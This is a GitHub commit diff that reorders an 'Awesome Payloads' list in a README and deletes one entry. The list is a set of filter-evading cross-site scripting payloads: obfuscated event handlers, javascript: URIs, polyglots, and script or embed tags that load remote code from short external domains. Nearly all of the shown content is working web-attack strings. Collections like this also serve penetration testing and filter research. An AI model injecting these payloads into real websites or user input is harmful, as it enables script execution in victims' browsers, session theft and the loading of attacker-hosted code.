added a new payload

This commit is contained in:
Somdev Sangwan 2018-07-28 23:26:15 +05:30 committed by GitHub
parent 32d5615a63
commit 8b1d0bf8a8
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -36,6 +36,8 @@ Put this repo on watch. I will be updating it regularly.
### Awesome Payloads ### Awesome Payloads
``` ```
<details open ontoggle=confirm()> <details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<a href="javascript%26colon;alert(1)">click <a href="javascript%26colon;alert(1)">click
<script/"<a"/src=data:=".<a,[8].some(confirm)> <script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()// <svg/x=">"/onload=confirm()//
@ -43,14 +45,13 @@ Put this repo on watch. I will be updating it regularly.
<svg%0Aonload=%09((pro\u006dpt))()// <svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x> <sCript x>(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) ""> <svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs> <embed src=//14.rs>
<script x=">" src=//15.rs></script> <script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //> <!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1) <iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x <x oncut=alert()>x
<svg onload=write()> <svg onload=write()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
``` ```
Here's an interesting XSS polyglot by [Ahmed Elsobky](https://github.com/0xsobky/): Here's an interesting XSS polyglot by [Ahmed Elsobky](https://github.com/0xsobky/):
``` ```